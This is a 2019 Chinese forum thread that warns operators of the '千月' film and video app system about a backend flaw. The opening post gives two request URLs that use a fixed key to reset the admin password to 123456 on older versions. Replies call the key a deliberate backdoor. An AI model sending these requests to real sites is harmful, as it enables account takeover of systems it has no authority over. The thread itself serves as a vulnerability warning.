查看: 89|回复: 8

千月,影视双端漏洞,在运营的注意了!!

[复制链接]

9

主题

50

回帖

151

积分

注册会员

积分
151
发表于 2019-6-22 09:38:02 | 显示全部楼层 |阅读模式
发个帖子水一波经验
千月,影视双端漏洞,在运营的注意了!!
前几天已经爆出漏洞利用代码 拿后台!!!


接下来看好了!!
XXXX/login/login/yzcode?username=admin&key=465454&password=123456
复制以上代码
如果出现下面的结果,则表示可以更改



接下来
XXXX/login/login/repass?username=admin&key=465454&password=123456
显示



出现以上结果,则表示,
账户  admin
密码已被更改为123456
拿下
目前爆出来的漏洞适用于旧版本,账户名为admin的
………………
所以,在运营的 如果用户名为admin!!!请马上更改!!!个别有动手能力的 改了安全码的 那就不用了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

16

主题

282

回帖

700

积分

高级会员

积分
700
发表于 2019-6-22 09:40:53 | 显示全部楼层
这是什么辣鸡程序,连登录都有漏洞
回复

使用道具 举报

153

主题

3257

回帖

7113

积分

论坛元老

积分
7113
发表于 2019-6-22 09:41:57 | 显示全部楼层
大佬厉害了
回复

使用道具 举报

36

主题

262

回帖

646

积分

高级会员

积分
646
发表于 2019-6-22 09:45:36 | 显示全部楼层
握草,到处都是后门
回复

使用道具 举报

45

主题

1719

回帖

3651

积分

论坛元老

积分
3651
发表于 2019-6-22 09:46:52 | 显示全部楼层
垃圾程序,结构不严谨
回复

使用道具 举报

108

主题

1691

回帖

3800

积分

论坛元老

积分
3800
发表于 2019-6-22 10:11:51 | 显示全部楼层
都忘记了,你不说我还不记得安装过这个,尼玛APP还在虚拟机呢,域名都忘记了。。。。
回复

使用道具 举报

109

主题

334

回帖

1093

积分

金牌会员

积分
1093
发表于 2019-6-22 10:13:16 | 显示全部楼层
有个key,说明是故意留下的后门了。。。并不是程序不严谨
回复

使用道具 举报

28

主题

1637

回帖

3504

积分

论坛元老

积分
3504
发表于 2019-6-22 10:25:42 | 显示全部楼层


後門
回复

使用道具 举报

50

主题

832

回帖

1926

积分

金牌会员

积分
1926
发表于 2019-6-22 10:34:27 | 显示全部楼层
app发一下
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关注公众号

相关侵权、举报、投诉及建议等,请发 E-mail:admin@discuz.vip

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖
关注公众号
返回顶部